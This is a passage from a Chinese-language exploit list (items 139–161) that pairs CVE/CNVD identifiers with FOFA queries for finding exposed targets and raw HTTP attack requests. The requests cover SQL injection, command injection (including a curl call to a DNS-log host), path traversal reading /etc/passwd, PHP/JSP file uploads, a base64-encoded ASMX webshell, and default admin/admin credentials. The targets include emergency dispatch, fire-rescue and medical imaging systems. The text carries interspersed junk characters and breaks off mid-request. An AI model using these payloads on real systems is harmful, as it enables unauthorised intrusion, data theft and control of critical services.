* ^+ I0 F1 i) Q& P139. 福建科立讯通信指挥调度平台editemedia.php sql注入
& K7 u* g& s3 ^9 H3 l( ECVE-2024-2622
9 C* O" B, @; b% o8 k% C1 w) aFOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
" H5 I9 p/ J9 J8 gGET /api/client/editemedia.php?enterprise_uuid=1%27%20AND%20(SELECT%203257%20FROM%20(SELECT(SLEEP(5)))JPVs)%20AND%20%27gDyM%27=%27gDyM HTTP/1.14 x0 G$ O7 T# i# a5 \. ?: V
Host: x.x.x.x
7 l" t( O0 h; \1 X& MUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0, \* _* j- W$ N/ V
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
* y$ @* l f( fAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
& i5 _- l( V' Y b* P h9 r% O" ^Accept-Encoding: gzip, deflate, br
% F+ A4 l4 h: ^- \6 DConnection: close' j/ H" ]+ \7 r6 w+ ]/ F1 F
Cookie: PHPSESSID=d62411cd4ada228583bbcae45f099567; authcode=cybk
8 |' K4 h4 z8 U) \Upgrade-Insecure-Requests: 1, I& d3 e4 ?! H6 w' d1 X% T2 t
: \: M4 e8 o- ?! C
4 o5 V' Z$ w1 E
140. 福建科立讯通信指挥调度平台get_extension_yl.php sql注入
9 c' M U. W; v1 o0 E: JCVE-2024-2566
7 _' G+ B0 M+ V+ VFOFA:body="app/structure/departments.php" || app="指挥调度管理平台"5 T9 X1 \, ~$ ^1 K* w5 A
GET /api/client/get_extension_yl.php?imei=1%27%20AND%20(SELECT%207545%20FROM%20(SELECT(SLEEP(5)))Zjzw)%20AND%20%27czva%27=%27czva×tamp=1&sign=1 HTTP/1.1
# [3 r( S2 S& c; k' JHost: x.x.x.x" a3 T7 f% C$ v. R0 v# N. \
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
# S. ? R$ j1 |Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
2 p1 h3 ~8 _' w- U. pAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2$ S5 V* o t) J U
Accept-Encoding: gzip, deflate, br; F! T9 `8 P9 G7 b' w
Connection: close
8 x3 o X x3 h j; MCookie: authcode=h8g9! ^9 m, `! s# s5 x
Upgrade-Insecure-Requests: 1
) h3 b9 {6 Z: m1 j+ o' u, X; A4 Z; ]8 }" p
- f5 y8 z7 s/ ]& H6 B2 T141. 建科立讯通信指挥调度管理平台 ajax_users.php SQL注入& H6 a; G5 R; G" g; a: v
FOFA:body="指挥调度管理平台"' x4 J3 r/ T6 c) _% `6 l
POST /app/ext/ajax_users.php HTTP/1.19 T' n( }3 Z8 t. e: w
Host: your-ip: B: z# m/ [2 U& K* g
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 info
9 W* P& ]: e' r$ S/ JContent-Type: application/x-www-form-urlencoded0 b0 B: ^* m8 t- ^: h! }
& S* |' o0 J0 J9 P; N
! o; ^% |' E3 O9 Q# d+ fdep_level=1') UNION ALL SELECT NULL,CONCAT(0x7e,md5(1),0x7e),NULL,NULL,NULL-- -- c" ]/ a4 Y v8 X: j2 {) s! }9 z
( Z" T- {4 }% t7 w+ S! _/ ]4 c0 p" q7 C. H# p! [
142. CMSV6车辆监控平台系统中存在弱密码! B3 k5 E. w0 s" R' N+ z# }
CVE-2024-29666
b7 X" Z. o, c1 o o1 P1 n. eFOFA:body="/808gps/"
! s+ b5 k/ x" D8 _- o5 V4 Eadmin/admin
; ?2 ^" r" n" r R8 i2 x143. Netis WF2780 v2.1.40144 远程命令执行, U& Q! E- l$ l# d$ F: v% ^
CVE-2024-25850
3 L5 w" G; P- P W0 i" rFOFA:title='AP setup' && header='netis': D5 u' A, K5 o1 ^* f$ h6 \
PAYLOAD# Q1 P' ~1 q! V$ g& h
& E w A+ s4 T2 Y j& j( p9 c; T144. D-Link nas_sharing.cgi 命令注入
5 @6 H) f3 z; ]" AFOFA:app="D_Link-DNS-ShareCenter"
* K! H/ I9 T4 c6 i0 [system参数用于传要执行的命令
" b0 @: Y3 J' T* yGET /cgi-bin/nas_sharing.cgi?user=mydlinkBRionyg&passwd=YWJjMTIzNDVjYmE&cmd=15&system=aWQ= HTTP/1.18 M, L4 a: w0 b5 w9 }
Host: x.x.x.x
K; H- m' G2 L6 H, t* xUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.05 ^! T1 u- {9 }7 Z
Connection: close: s. P8 v- p1 p4 j/ S X/ Q" R% Z
Accept: */*5 Z% M9 x6 b( M0 N0 o3 _
Accept-Language: en2 Y& `+ f6 L9 p5 }; _# G: ^' a, H
Accept-Encoding: gzip
( l8 d0 x' m0 x! G4 P7 V; l. L/ q, B0 j) ]. C' c; N! T e1 E
- A% N/ X- Y4 A. M5 `9 K9 y
145. Palo Alto Networks PAN-OS GlobalProtect 命令注入
3 m7 G b! U DCVE-2024-34003 j1 x4 L* s4 X2 P
FOFA:icon_hash="-631559155"; ]* @( S9 @! { t5 Z* A& R
GET /global-protect/login.esp HTTP/1.1) m! s/ w1 y8 B1 E
Host: 192.168.30.112:1005
' L+ b* l1 }3 u; c/ `: a* F4 bUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Edg/92.0.902.84' A5 s: H% {9 Q9 x
Connection: close: t/ z; g, g ^) s
Cookie: SESSID=/../../../opt/panlogs/tmp/device_telemetry/minute/hellothere226`curl${IFS}dnslog地址`;
( d$ Y% j9 c% y' a5 I# YAccept-Encoding: gzip a' A8 L- r' \$ {
1 P) L h( H! i& E$ {! |6 o5 ^' G; T3 A, B9 Y, B E
146. MajorDoMo thumb.php 未授权远程代码执行8 C: s0 I* Q9 y2 O4 p, t: F, G
CNVD-2024-02175" W. M# p% E: C' X# U
FOFA:app="MajordomoSL") K; f, z/ V4 x& z4 g7 q- Y
GET /modules/thumb/thumb.php?url=cnRzcDovL2EK&debug=1&transport=%7C%7C+%28echo+%27%5BS%5D%27%3B+id%3B+echo+%27%5BE%5D%27%29%23%3B HTTP/1.1
+ {; d5 R0 }: q0 h* i7 N- m$ oHost: x.x.x.x: `, b0 w. w* P' X+ [# q3 r, W& y
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Edg/92.0.902.84" v p( H% b" \8 E, q* Q# S
Accept-Charset: utf-8
. g& X+ P6 d* |9 ~1 EAccept-Encoding: gzip, deflate
7 m$ A/ a6 C; \) N3 `& nConnection: close5 S& F9 o& R/ q- N. Q
* _0 }3 i/ X* l+ z; C) k) b* m! Y" X- q
147. RaidenMAILD邮件服务器v.4.9.4-路径遍历1 K( L9 ~4 u, c2 S8 z
CVE-2024-32399
8 E7 U/ @5 Y# X% R9 Y( LFOFA:body="RaidenMAILD", q) R/ c# N1 {: H% W t
GET /webeditor/../../../windows/win.ini HTTP/1.1
! H) i, a0 k3 @5 WHost: 127.0.0.1:81
1 V3 S1 H" p3 n& U. I/ rCache-Control: max-age=0
* o! R {( K) \" |9 fConnection: close) {& t3 k' n3 H
9 w- f0 _! E5 l/ Y6 T
$ B- n' r$ l X+ X148. CrushFTP 认证绕过模板注入
4 Y9 G( a! W! R* k1 l& X) U S: p( HCVE-2024-4040
0 L0 N% P5 Y' G: gFOFA:body="CrushFTP"& \8 b' B) h9 q
PAYLOAD' A1 P2 C& _7 n( ?% X
1 ~5 }9 U+ i1 | X9 O( O149. AJ-Report开源数据大屏存在远程命令执行
' u8 s0 P1 n2 v1 mFOFA:title="AJ-Report"# l2 s& ~9 ^+ z
/ h" L0 `; R) c; N( }# P, A# LPOST /dataSetParam/verification;swagger-ui/ HTTP/1.1; R- j+ r% P9 Y- ]4 z" {6 A
Host: x.x.x.x
3 W8 J! E+ f, i3 b B' B7 KUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
# G5 l+ h2 N5 ]0 J0 [Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7( F6 \. x: Z# O' z5 x
Accept-Encoding: gzip, deflate, br
7 @; E' R5 y$ _6 pAccept-Language: zh-CN,zh;q=0.9
/ o8 d1 J! @8 q& U$ Q# y. {Content-Type: application/json;charset=UTF-8
& d- H. x0 ]) f# l1 ~) b @Connection: close
7 _2 y- e6 ]% ]$ M6 J0 E0 y6 z1 G& W7 G- O* A1 Q% E- P
{"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"ipconfig\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}
+ i& m; t- t# ]# _7 G7 ^
9 F4 k% c/ G/ P150. AJ-Report 1.4.0 认证绕过与远程代码执行
( M/ u w1 |1 R, T* F2 TFOFA:title="AJ-Report"
5 { }2 j, ]& QPOST /dataSetParam/verification;swagger-ui/ HTTP/1.1$ k* x% ~" j$ _* X0 N
Host: x.x.x.x
# |5 g5 N" d: Q( Q1 XUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
# t1 o2 m' |5 T [Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7) U3 Y7 @# `$ R! t# A" c
Accept-Encoding: gzip, deflate, br
- ]4 H+ N$ P2 Q2 S2 g KAccept-Language: zh-CN,zh;q=0.9( M# ~8 f% ]. q* r; e- O! `
Content-Type: application/json;charset=UTF-8
, Y- U% y+ f6 G1 n8 UConnection: close2 c% n) s+ D' C+ H; A& z9 h: I+ x. g) H
Content-Length: 339
$ i4 J4 r) a) u6 r6 t1 P, }2 M7 O! m! |6 _* w2 @3 Q/ ^7 G! h) X$ X+ v
{"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"id\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}7 m0 _& m! S1 l" Q$ j
) R* O& n4 r9 t# D# w! n2 m
4 n! ~: i: t7 E2 @ G151. AJ-Report 1.4.1 pageList sql注入
2 r1 V2 w, n# g( B3 q7 ^FOFA:title="AJ-Report"
3 s z, x C! A, x5 f; F5 PGET /;swagger-ui/dataSource/pageList?showMoreSearch=false&pageNumber=1&pageSize=10 HTTP/1.1
' d% u0 a4 w5 q @Host: x.x.x.x
% [6 U1 O) F! o3 G) v* l$ EUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
2 }; w0 P# S$ T- s" ^* K$ ]Connection: close
. R+ U* Z/ G3 @Accept-Encoding: gzip
6 L% l7 i1 t5 d7 L; M+ J6 b& ]6 f) p- q8 x) G
/ Z4 A7 Y' x( c# J/ n* E+ p4 T
152. Progress Kemp LoadMaster 远程命令执行
) P* r. X7 c, G. B4 [CVE-2024-1212+ Z5 [$ D& d/ f% s) s5 @9 p
LoadMaster <= 7.2.59.2 (GA)) o P' I: b o& n2 z* C
LoadMaster<=7.2.54.8 (LTSF)
2 ^& ~ j3 E( T8 R# n: v& d4 u0 m$ zLoadMaster <= 7.2.48.10 (LTS); d1 z/ F6 k! v9 S! c9 C
FOFA:body="LoadMaster"
( n6 }; c$ Y( XJztsczsnOmRvZXNub3RtYXR0ZXI=是';ls;':doesnotmatter的base64编码% Y5 Q! L5 h$ }
GET /access/set?param=enableapi&value=1 HTTP/1.1
6 p/ l+ y- M/ YHost: x.x.x.x' @6 c: i! h$ M' n& {) q
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_0) AppleWebKit/604.1 (KHTML, like Gecko) Version/9.1.2 Safari/604.1
2 x3 L( O: _- d s* p% q" tConnection: close
) [! E% _, v: @4 n0 MAccept: */*( B! o6 ~. I9 f$ x, `( G% \
Accept-Language: en" Q: k6 D; ]* C- j
Authorization: Basic JztsczsnOmRvZXNub3RtYXR0ZXI=
; s, ?9 }* D5 M8 j- NAccept-Encoding: gzip% `9 @3 m) c& K( U2 C! ~9 G
2 G7 F/ n" c9 L/ B
8 c- d4 ~3 T' |0 W3 n
153. gradio任意文件读取# J* C7 L1 p# r5 t4 ]# K2 O2 w
CVE-2024-1561FOFA:body="__gradio_mode__"
9 \, c4 S% Y* Y% V1 q第一步,请求/config文件获取componets的id' y6 z+ ]: ?6 _+ W% R3 I0 D* p
http://x.x.x.x/config0 d' B+ v4 C( a% \& x! b3 }1 K" d
% S6 H2 h' Y r
9 P" G0 A/ K. n- c* i2 Y7 |第二步,将/etc/passwd的内容写入到一个临时文件, ^% C6 k7 N, J! z- m. a) s: c
POST /component_server HTTP/1.1 A+ D8 k; U, _, Y1 [2 M3 `3 _) A% _
Host: x.x.x.x
' u5 k6 K/ Q; y: Q3 E) F2 ~User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.3 Safari/605.1.1514.1.3 Ddg/14.1.39 z0 r; y6 s* B3 i( R- x
Connection: close
, y' _: a: d5 k- FContent-Length: 1155 m, c4 v8 }6 ^6 }! `7 _$ D! p
Content-Type: application/json
0 ]5 `4 }5 `2 Z- q' TAccept-Encoding: gzip) [0 Y5 D7 K: E a3 j4 @8 R: T
6 [6 n# H: w$ M0 t5 W; a2 W{"component_id": "1","data": "/etc/passwd","fn_name": "move_resource_to_block_cache","session_hash": "aaaaaaaaaaa"}
& x2 C" X& k" W) Y }
: B2 I( p' V3 Z+ }9 e! Z- _- G& d
第三步访问: f; }& {) O( [
http://x.x.x.x/file=/tmp/gradio/ ... 8cdf49755073/passwd' A. Y$ f/ p0 n2 d/ A/ B2 J
' E+ n) m! d, k/ _* a
5 j1 ~; i8 f, e! S& U8 @+ M' R" Y
154. 天维尔消防救援作战调度平台 SQL注入5 d3 r6 q6 T; q/ C5 W& p
CVE-2024-3720FOFA:body="天维尔信息科技股份有限公司" && title=="登入"
/ r2 T& D; |4 k; d7 v/ RPOST /twms-service-mfs/mfsNotice/page HTTP/1.1 R% y1 F8 t4 x, r& Q
Host: x.x.x.x2 b* B% ?4 |6 y$ o* {
Content-Length: 1064 O# r( V- d2 |, _2 j c3 c. s+ p
Cache-Control: max-age=0
0 K! w* B6 c" B$ J' s; A* t% q1 \7 x" RUpgrade-Insecure-Requests: 1
: x1 b% c! F) J! z" Q( GOrigin: http://x.x.x.x
$ s2 T" z( p) ], ^' r" sContent-Type: application/json
) g# h6 c% D! b8 |User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36# N2 l w: T2 y
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.79 i8 {# ^6 N4 C5 n& f
Referer: http://x.x.x.x/twms-service-mfs/mfsNotice/page: Z6 N7 @4 U' d4 Y
Accept-Encoding: gzip, deflate
3 O; f2 M1 W, m$ A: rAccept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7
3 n5 ~) h4 `1 V; v2 I$ jConnection: close
0 T3 q/ m6 N7 V" X' Q' v" {9 }6 {' C5 L7 j4 P5 l, a0 n- w
{"currentPage":1,"pageSize":19,"query":{"gsdwid":"1f95b3ec41464ee8b8f223cc41847930') AND 7120=(SELECT 7120 FROM PG_SLEEP(5)) AND ('dZAi'='dZAi"},"hgubmt748n4":"="}
, v+ k$ H; Q1 I, |
& l8 O5 O2 j4 f* ^& b& q
% w8 ^! }( u1 {155. 六零导航页 file.php 任意文件上传
5 }$ O; K# u7 s' K# aCVE-2024-34982& ^% o3 E8 {6 G+ Z, P
FOFA:title=="上网导航 - LyLme Spage"4 i- z8 e: k4 I
POST /include/file.php HTTP/1.1' v5 a' d/ w8 I3 J# B0 W
Host: x.x.x.x
4 ?) n3 g _( B0 [' W. _ \' `User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
$ T2 |7 |/ Z2 `- nConnection: close* R9 \# X7 }9 Q! l# X7 I+ k2 }
Content-Length: 232
1 u" }) e( |) Q# @/ Q1 Q. DAccept: application/json, text/javascript, */*; q=0.01
! ~* Y' @( k3 n, JAccept-Encoding: gzip, deflate, br7 K* l" A9 q+ S: A% u Q
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.24 V- c7 S- ]; X7 Y8 `7 h
Content-Type: multipart/form-data; boundary=---------------------------qttl7vemrsold314zg0f
. V3 ~3 S |+ W" mX-Requested-With: XMLHttpRequest, d8 j5 @" H1 P! F0 P. R
1 w4 H# S0 r. {1 E4 D+ G9 z-----------------------------qttl7vemrsold314zg0f
2 j: v2 a# c' y& E1 v" QContent-Disposition: form-data; name="file"; filename="test.php"
# t! j5 E i, E; M; ]Content-Type: image/png {" F( M% n5 N% y A% t5 |0 p
$ b( j$ o4 ~' e* `( C
<?php phpinfo();unlink(__FILE__);?>
' L* D! U7 E% V-----------------------------qttl7vemrsold314zg0f--
; }! D- o% W. p- v9 x0 H! _. W0 R2 a Y! |' Z- U
0 }' o5 [* E9 [6 G* `2 s( y$ }5 d
访问回显文件http://x.x.x.x/files/upload/img_664ab7fd14d2c.php, Z7 A" t: r# B# [# D
% L! R& Q' |5 z+ ^' N% B' N3 {
156. TBK DVR-4104/DVR-4216 操作系统命令注入4 f X* Y! w" \# L/ w
CVE-2024-3721- Y- L! b( m9 s$ m( M
FOFA:"Location: /login.rsp"* e$ M6 s2 J' t" g* R7 }
·TBK DVR-4104$ Y( T: E- ]& _
·TBK DVR-42169 {- x4 ?9 a) b6 y" L$ G; w+ O
curl "http://<dvr_host>:<port>/device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=<URL_ENCODED_SHELL_COMMAND>" -H "Cookie: uid=1"
( l6 z5 h. t3 x: {# x! d1 d' J* z* V/ X' X M
7 K% j- j2 F6 F1 M1 N Y; o( y: N
POST /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=echo%3B%20echo%20asrgkjh0%20%3E%20%2Fvar%2Fexample.txt%3B%20ls%20-l%20%2Fvar%3B%20echo%20----------------%3B%20cat%20%2Fvar%2Fexample.txt%3B HTTP/1.13 F8 }- k- S% E$ P9 i% l& [4 N
Host: x.x.x.x7 ?' v3 j5 w& o5 @
User-Agent: Mozilla/5.0 (Macintosh;T2lkQm95X0c= Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15$ w: L7 @! X. L5 F, X: j
Connection: close
3 Y+ ~" ~/ d0 I, h$ `+ g& OContent-Length: 06 o) Y. k. A1 s# T; |
Cookie: uid=1) X2 b( z( j) c7 O# E O' A" h
Accept-Encoding: gzip
4 j/ `5 k1 v# J: D y7 T2 k. e: f' Q' e
6 w6 c: g* b6 O( D- P% X
157. 美特CRM upload.jsp 任意文件上传
5 |( u# B' v3 }# k( R' {) wCNVD-2023-06971
7 }( S" |+ P1 o' iFOFA:body="/common/scripts/basic.js"$ ]* ?+ A) ~* C, Z& ^
POST /develop/systparam/softlogo/upload.jsp?key=null&form=null&field=null&filetitle=null&folder=null HTTP/1.1
6 T9 g& \$ `7 ?' SHost: x.x.x.x
8 m: v' v, q$ P9 ~# lUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
$ |/ L- C( O9 X; k3 m( K2 K) [( FContent-Length: 7094 E6 h) e# O4 D& P, j- Q
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7; Q4 p/ h) \$ _2 w+ ?. u6 o
Accept-Encoding: gzip, deflate
3 I" S1 p% W% l) R8 t) g1 SAccept-Language: zh-CN,zh;q=0.9
' m' X' `( @) w: s; y0 i, jCache-Control: max-age=0
! p% ]) U2 @! ~, WConnection: close
5 e0 z& B% m! u# ?Content-Type: multipart/form-data; boundary=----WebKitFormBoundary1imovELzPsfzp5dN1 L G- E( @: g* I* ?6 r, c2 F
Upgrade-Insecure-Requests: 1
7 U3 a/ r! o" ~' |6 o% k
& q1 _* y5 @6 ~4 m8 w------WebKitFormBoundary1imovELzPsfzp5dN
) d( ~* } U1 t" ^Content-Disposition: form-data; name="file"; filename="kjldycpvjrm.jsp"9 B( ^% d' @7 {
Content-Type: application/octet-stream
8 ` Z" l" t2 ^0 C
% ] ?& h) M3 q/ O0 Nnyhelxrutzwhrsvsrafb
1 v4 _6 H) k [------WebKitFormBoundary1imovELzPsfzp5dN
" P8 a, i" h) p* V2 WContent-Disposition: form-data; name="key"
$ ?) Y, e+ n b7 r: M. p/ ~, G: M0 ^
( E6 {: `7 O# x' r# D; Enull
& A2 t5 c: g6 f+ O------WebKitFormBoundary1imovELzPsfzp5dN1 n& h; ^0 B2 c4 N$ b# p
Content-Disposition: form-data; name="form"% s: U% }, R- z3 m& [ j) I, B
. ]- f/ \4 ?, ?& enull5 x% h, r, M4 T) J, e, C( f w
------WebKitFormBoundary1imovELzPsfzp5dN/ Y- p9 } p8 r$ Y5 o
Content-Disposition: form-data; name="field"$ b7 \& r" @) D9 E0 |
! [, g& Y) ?: O5 u- ^
null1 k" T; L6 v7 U7 F' d
------WebKitFormBoundary1imovELzPsfzp5dN
+ k, J: P8 `: E1 Y" g) rContent-Disposition: form-data; name="filetitile"% M, G) B4 ~, y$ L/ \* p
( [+ C1 Z3 K5 H2 G8 ], l* h6 ~null
$ i E2 \2 u$ |- s------WebKitFormBoundary1imovELzPsfzp5dN
; q8 i* I6 ^+ W. `, EContent-Disposition: form-data; name="filefolder"- G3 _8 _ Z5 q4 `* E* M& t
- ?. m3 E; L4 t' m. U
null
4 l' I% V! G8 G8 f8 X------WebKitFormBoundary1imovELzPsfzp5dN--( F3 o$ e7 n4 m5 Y5 u% v' Q. O
4 A. F& p5 z: N; {$ j. R
1 L2 t0 w6 E+ F2 z( w7 @http://x.x.x.x/userfile/default/userlogo/kjldycpvjrm.jsp( C- H. D/ }5 [0 ?
3 u" O7 a h. ~+ t* \' s
158. Mura-CMS-processAsyncObject存在SQL注入
, `; ]( K/ T, T" {5 _- SCVE-2024-32640
/ E R+ u, G: XFOFA:"Generator: Masa CMS". u( v; t/ B( l* H' }+ u7 L
POST /index.cfm/_api/json/v1/default/?method=processAsyncObject HTTP/1.1
+ u! o4 U% a7 A' w: j: x8 `Host: {{Hostname}}) y+ W% e7 ? l% W3 j) c( X% D+ s
Content-Type: application/x-www-form-urlencoded
, W: ~9 ?3 i/ Q) U" L h# G8 d; j+ ?& x% N8 j# o/ u
object=displayregion&contenthistid=x\'&previewid=12 |. N! q6 C$ {3 k* @+ l
7 \4 B4 Z0 M" l: d+ x) }
! \$ Q# y$ _9 _: d/ n$ |: Y159. 英飞达医学影像存档与通信系统 WebJobUpload任意文件上传: ^& ?- F9 }5 w0 n
FOFA:"INFINITT" && (icon_hash="1474455751"|| icon_hash="702238928")5 J6 I& F" W& d) n1 U2 C+ V
POST /webservices/WebJobUpload.asmx HTTP/1.1" n# {# W. m! M% @, f; [
Host: x.x.x.x' k5 {& r, o# Y: a2 s+ A: d
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36$ ]; {( C' l6 p$ b, Z( a
Content-Length: 10804 g( C# F5 Q5 ]' g9 x
Accept-Encoding: gzip, deflate1 O5 |4 Z' ]+ v% o4 p: m
Connection: close
$ d& A f1 `+ VContent-Type: text/xml; charset=utf-8! o' c" @4 E$ K* w9 y
Soapaction: "http://rainier/jobUpload"
( W+ ^+ ^4 N6 k& | C$ H- K; o8 A: k: t1 a$ j. @; U
<?xml version="1.0" encoding="utf-8"?>
; [$ ~2 w3 S7 R; {# ?: d, }# K<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
2 G) k7 s3 X! D7 L5 u$ H' O+ E<soap:Body> }4 j/ I8 X5 j
<jobUpload xmlns="http://rainier">
( ]* p+ @" ?) V0 j<vcode>1</vcode>4 Q+ Z! ~- N: t2 u6 j2 ]! V% y
<subFolder></subFolder>8 u1 S. b4 E# ~/ U
<fileName>abcrce.asmx</fileName>' @6 E( C7 {: L( V% B8 x3 w
<bufValue>PCVAIFdlYlNlcnZpY2UgTGFuZ3VhZ2U9IkpTY3JpcHQiIENsYXNzPSJXZWJTZXJ2aWNlMSIgJT4KIAppbXBvcnQgU3lzdGVtO2ltcG9ydCBTeXN0ZW0uV2ViO2ltcG9ydCBTeXN0ZW0uSU87aW1wb3J0IFN5c3RlbS5XZWIuU2VydmljZXM7CmltcG9ydCBTeXN0ZW0uV2ViLlNjcmlwdC5TZXJ2aWNlczsKaW1wb3J0IFN5c3RlbS5XZWI7CmltcG9ydCBTeXN0ZW0uV2ViLlNlcnZpY2VzOwogCnB1YmxpYyBjbGFzcyBXZWJTZXJ2aWNlMSBlleHRlbmRzIFdlYlNlcnZpY2UKewogCldlYk1ldGhvZEF0dHJpYnV0ZSBTY3JpcHRNZXRob2RBdHRyaWJ1dGUgZnVuY3Rpb24gQ21kc2hlbGwoUGFzcyA6IFN0cmluZykgOiBWb2lkCiAgICB7CiAgICAgICAgICAgIHZhciBjIID0gSHR0cENvbnRleHQuQ3VycmVudDsKICAgICAgICAgICAgdmFyIFJlcXVlc3QgPSBjLlJlcXVlc3Q7CiAgICAgICAgICAgIHZhciBSZXNwb25zZSA9IGMuUmVzcG9uc2U7CiAgICAgICAgICAgIGV2YWwoUGFzcyk7CiAgICCB9Cn0=</bufValue>, c( d7 Q/ P7 Q, n' m1 y+ V
</jobUpload>
5 y4 G4 q8 T! c3 C. g</soap:Body>
/ `: o C1 V* k6 G</soap:Envelope>/ Z: M. z3 V9 W- Q
1 z x( V; {8 T3 V' h/ |, j9 }
6 s, F' x" Z+ ]: y/1/abcrce.asmx/Cmdshell?Pass=Response.Write("Hello,World")2 P- |" s) x V& _3 N
8 L4 c# o% |4 c$ \' ^+ o: D- G' C7 H9 C1 h
160. Sonatype Nexus Repository 3目录遍历与文件读取
: a! ]4 h, ^/ _" c2 XCVE-2024-49563 N! Q W- q; l+ l; r7 c: i: s$ m
FOFA:title="Nexus Repository Manager"3 N3 b% z2 ^0 n9 C% E# M2 h
GET /%2F%2F%2F%2F%2F%2F%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1% y- Q. |- W! v
Host: x.x.x.x
8 {- u: N+ M, Q) L* @ \User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:21.0) Gecko/20100101 Firefox/21.0, b; N8 R8 s( ^
Connection: close P& z% t* K% y3 }4 P: N2 o5 k
Accept: */*
) G, `$ a1 P1 {5 g2 u) q& p% u" n qAccept-Language: en
7 H w+ h( a4 i! W* C8 C/ oAccept-Encoding: gzip, a; w8 A* Q2 I7 v2 o5 u: {+ [
, d" e5 b& D+ u9 z
4 b7 x _9 Q- a% S& ~161. 科拓全智能停车收费系统 Webservice.asmx 任意文件上传
0 ?" [2 O/ S# ]5 m2 H6 o4 nFOFA:body="/KT_Css/qd_defaul.css" @9 n/ ]: u8 v3 l: c
第一步,上传文件<fileName>字段指定文件名,<fileFlow>字段指定文件内容,内容需要base64加密5 C& R. f, }! |9 A5 Z6 l. \# U
POST /Webservice.asmx HTTP/1.1+ C$ E' P, L# e
Host: x.x.x.x
g0 `7 o" I9 ]0 oUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36& [ D1 v; U$ z5 [& f+ x/ ?4 j. x
Connection: close
2 a/ v& T' ^% q7 a9 oContent-Length: 4457 F. I3 h7 _" U- ], O1 d4 G2 \# v
Content-Type: text/xml S& B' X& N+ i( m5 ?1 k
Accept-Encoding: gzip: T! b' E8 Q; l. j: ~
+ X% Z5 q$ Y3 _% S
<?xml version="1.0" encoding="utf-8"?>
; U8 k3 G0 O1 j# s, T, @, k3 o+ O<soap:Envelope xmlns:xsi="0 S3 T9 M9 I6 ?% K
http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema"
, J7 u. ~" z8 C6 v+ g6 cxmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">9 z# X. X* |( C" s
<soap:Body>
